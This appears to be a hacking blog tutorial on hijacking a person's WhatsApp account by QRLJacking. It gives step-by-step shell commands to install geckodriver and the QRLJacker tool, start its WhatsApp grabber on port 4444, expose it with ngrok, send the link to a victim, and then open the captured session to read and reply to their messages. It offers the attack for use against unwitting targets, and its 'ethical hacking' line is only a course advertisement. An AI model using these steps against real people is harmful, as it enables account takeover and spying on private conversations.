Ticker

6/recent/ticker-posts

QRL Jacking | Make Access On Anyone WhatsApp Without Touch | 2022 Working

The most asked question to me from newbies in hacking is the "How To Hack Whatsapp Without Touching Victim Device", So today I show you how actually hacker/attacker makes access to victim's account without even touching or asking for any OTP from victim just using social engineering technique.

Click On Image To Watch Video Tutorial

Before diving into this information let me clear you one thing so it's easy to understand what we are going to do. Whatsapp has end-to-end encryption so it's near to impossible to directly spy or read victim Whatsapp messages, different methods are used in different conditions and situations like MacSpoofing, OTP Phishing, SS7, and some others. 

QRLJacking

In this article, I'll show you a method known as QRLJacking in which attacker/hacker send a malicious link to the target device and make them scan their QR code of WhatsApp, so attacker/hacker is able to catch the WhatsApp web session in which they can read/spy or respond messages.

Requirements

  • Linux/macOS (Linux Recommended)
  • Firefox Latest Version
  • Python 3.7+
I am going to show a Linux tutorial in this article. 

Steps

  • First of all, you have to download the driver for firefox and setup in your Linux system using the commands given below:
wget https://github.com/mozilla/geckodriver/releases/download/v0.30.0/geckodriver-v0.30.0-linux64.tar.gz
tar -xvf geckodriver-v0.30.0-linux64.tar.gz
chmod +x geckodriver
sudo mv -f geckodriver /usr/local/share/geckodriver
sudo ln -s /usr/local/share/geckodriver /usr/local/bin/geckodriver
sudo ln -s /usr/local/share/geckodriver /usr/bin/geckodriver
  • Now download and set up the QRLJacking tool given commands
git clone https://github.com/OWASP/QRLJacking
cd QRLJacking/QRLJacker
pip install -r requirements.txt
python3 QrlJacker.py

Now the QRLJacker interface opens on your Terminal as shown in the image.

Now we are ready to perform vector QR Jacking attack, type given commands:
use grabber/whatsapp
set port 4444
run
I am testing this tool on my localhost (You can do port forwarding for out of LAN devices and I recommend use ngrok for it) so my port is 4444 and the host is 0.0.0.0 in this tutorial. So in my case, the QR code link is 0.0.0.0:4444 .

Now send that link to victim and once victim scanned their WhatsApp web QR code, hacker/attacker get a session saved on this tool to later access a WhatsApp Web session.
  • Press Ctrl +C to intercept the QRJacker tool and type commands given below:
sessions
  • Now the list of saved sessions is shown on your Terminal (In my case "0")
sessions -i 0
Now wait a few seconds and Firefox automatically launched and you get a WhatsApp web session of victim as shown in the image given below.

I hope this information is helpful for you and if you still face any problems or errors then feel free to reach me. If you want to learn complete Ethical Hacking from scratch level then try our "Hacking Like Watch Dogs" course and start your journey from today. Thanks for reading, until next time.